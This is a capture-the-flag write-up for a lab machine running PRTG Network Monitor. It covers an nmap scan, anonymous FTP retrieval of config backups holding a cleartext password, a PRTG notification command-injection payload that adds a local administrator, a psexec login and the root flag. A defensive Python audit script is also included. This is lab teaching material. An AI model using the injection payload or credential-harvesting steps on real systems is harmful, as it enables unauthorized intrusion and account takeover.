Service overview

We use nmapAutomator to scan the machine 10.10.10.151:

$ nmapAutomator.sh -H 10.10.10.152 -t Full
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4m11s, deviation: 0s, median: 4m10s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-06-10T12:15:25
|_  start_date: 2021-06-10T12:06:54

FTP

We find anonymous FTP access, from which we will grab the password for PRTG.

$ ftp 10.10.10.152
ftp> cd Users\Public
ftp> get user.txt
$ cat user.txt
ftp> cd "/ProgramData/Paessler/PRTG Network Monitor"
ftp> get "PRTG Configuration.dat"
ftp> get "PRTG Configuration.old"
ftp> get "PRTG Configuration.old.bak"
ftp> get "PRTG Graph Data Cache.dat"
$ nano 'PRTG Configuration.old.bak'
<dbpassword>
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>

But this lead turns out to be a dead end.
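As an added defensive example (not from the original writeup): a small Python audit that parses a PRTG-style configuration backup and reports credential elements stored in the clear, like the <dbpassword> fragment above, so such backups can be checked before they land on an anonymous FTP share. The sample XML, the set of secret tag names and the crypt="true" marker for encrypted cells are assumptions.

```python
"""Audit a PRTG-style configuration backup for credentials stored in the clear."""
import re
import xml.etree.ElementTree as ET

# Constructed sample modelled on the fragment seen in 'PRTG Configuration.old.bak'.
# The second <dbpassword> and the crypt="true" cell are assumed markers of an
# encrypted value; <snmpcommunity> is an assumed additional secret-bearing tag.
SAMPLE_CONFIG = """<?xml version="1.0"?>
<data>
  <dbpassword>
    <!-- User: prtgadmin -->
    PrTg@dmin2018
  </dbpassword>
  <dbpassword>
    <flags><encrypted/></flags>
    <cell col="0" crypt="true">AAAABBBB</cell>
  </dbpassword>
  <snmpcommunity>public</snmpcommunity>
</data>
"""

SECRET_TAGS = {"dbpassword", "password", "snmpcommunity"}  # assumption


def redact(value):
    """Keep the first two characters so a reviewer can correlate, hide the rest."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "**"


def find_cleartext_secrets(xml_text):
    """Return (tag, user_from_comment, redacted_value) for every secret element
    whose value is stored in the clear, i.e. has no crypt="true" cell under it."""
    parser = ET.XMLParser(target=ET.TreeBuilder(insert_comments=True))
    root = ET.fromstring(xml_text, parser=parser)
    findings = []
    for elem in root.iter():
        if elem.tag not in SECRET_TAGS:
            continue
        encrypted = any(c.get("crypt") == "true" for c in elem.iter("cell"))
        text = (elem.text or "").strip()
        user = None
        for child in elem:
            if child.tag is ET.Comment:
                m = re.search(r"User:\s*(\S+)", child.text or "")
                user = user or (m.group(1) if m else None)
                # The cleartext value may trail the comment, as in the writeup's fragment.
                text = text or (child.tail or "").strip()
        if not encrypted and text:
            findings.append((elem.tag, user, redact(text)))
    return findings


if __name__ == "__main__":
    for tag, user, value in find_cleartext_secrets(SAMPLE_CONFIG):
        print(f"cleartext secret in <{tag}> (user={user}): {value}")
```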

PRTG Command Injection

Following the referenced article, we get arbitrary code execution.

Setup --> Notifications --> Add new notification --> execute program (.ps1)

With this action we add a user htb with local administrator rights.

abc.txt | net user htb Password123! /add; net localgroup administrators htb /add

After that, we run this program and then connect using psexec.

psexec.py htb:'Password123!'@10.10.10.152

Flags

C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::99d2:57a8:7e47:5556
   Link-local IPv6 Address . . . . . : fe80::99d2:57a8:7e47:5556%3
   IPv4 Address. . . . . . . . . . . : 10.10.10.152
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%3
                                       10.10.10.2
Tunnel adapter isatap.{A764AE58-73C4-468A-B78D-4878FECEFC66}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
C:\Users\Administrator\Desktop>type root.txt
3018977fb944bf1878f75b879fba67cc